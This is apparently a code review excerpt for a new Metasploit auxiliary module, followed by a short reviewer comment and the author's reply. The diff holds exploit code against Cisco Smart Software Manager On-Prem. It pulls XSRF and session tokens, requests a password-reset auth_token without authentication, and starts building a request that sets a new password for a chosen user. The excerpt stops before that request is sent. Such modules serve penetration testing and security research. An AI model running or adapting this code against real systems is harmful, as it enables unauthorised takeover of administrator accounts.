modules/auxiliary/admin/http/cisco_ssm_onprem_account.rb

```diff
@@ -0,0 +1,160 @@
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'backend/settings/oauth_adfs'),
+      'vars_get' => {
+        'hostname' => Rex::Text.rand_text_alpha(6..10)
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+    if res.code == 200
+      print_good('Server reachable.')
+    else
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from the target.')
+    end
+
+    raw_res = res.to_s
+
+    # Extract XSRF-TOKEN value
+    xsrf_token_regex = /XSRF-TOKEN=([^;]*)/
+    xsrf_token = xsrf_token_regex.match(raw_res)
+
+    if xsrf_token
+      xsrf_token_value = xsrf_token[1]
+      if xsrf_token_value && !xsrf_token_value.empty?
+        decoded_xsrf_token = decode_url(xsrf_token_value)
+        print_good("Retrieved XSRF Token: #{decoded_xsrf_token}")
+      else
+        fail_with(Failure::UnexpectedReply, 'XSRF Token value is null or empty.')
+      end
+    else
+      fail_with(Failure::UnexpectedReply, 'XSRF Token not found')
+    end
+
+    # Extract _lic_engine_session value
+    lic_token_regex = /_lic_engine_session=([^;]*)/
+    lic_token = lic_token_regex.match(raw_res)
+
+    if lic_token
+      lic_token_value = lic_token[1]
+      if lic_token_value && !lic_token_value.empty?
+        print_good("Retrieved _lic_engine_session: #{lic_token_value}")
+      else
+        fail_with(Failure::UnexpectedReply, '_lic_engine_session value is null or empty.')
+      end
+    else
+      fail_with(Failure::UnexpectedReply, '_lic_engine_session not found')
+    end
+
+    # 2) Request generate_code to retrieve auth_token
+    payload = "{\"uid\": \"#{datastore['USER']}\"}"
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'headers' => {
+        'X-Xsrf-Token' => decoded_xsrf_token,
+        'Cookie' => "_lic_engine_session=#{lic_token_value}; XSRF-TOKEN=#{decoded_xsrf_token}"
+      },
+      'uri' => normalize_uri(target_uri.path, '/backend/reset_password/generate_code'),
+      'data' => payload
+    })
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+    if res.code == 200
+      json = res.get_json_document
+      if json.key?('error_message')
+        fail_with(Failure::UnexpectedReply, json['error_message'])
+      elsif json.key?('auth_token')
+        print_good('Retrieved auth_token: ' + json['auth_token'])
+      end
+    else
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from the target.')
+    end
+
+    auth_token = json['auth_token']
+
+    # 3) Request reset_password to change the password of the specified user
+    payload = "{\"uid\": \"#{datastore['USER']}\", \"auth_token\": \"#{auth_token}\", \"password\": \"#{datastore['NEW_PASSWORD']}\", \"password_confirmation\": \"#{datastore['NEW_PASSWORD']}\", \"common_name\": \"\"}"
```

Comment:
could this be replace with a ruby hash and a call to `to_json` 
`{ uid: datastore['USER'], ... }.to_json`

Reply:
Yes, I have updated it, thank you.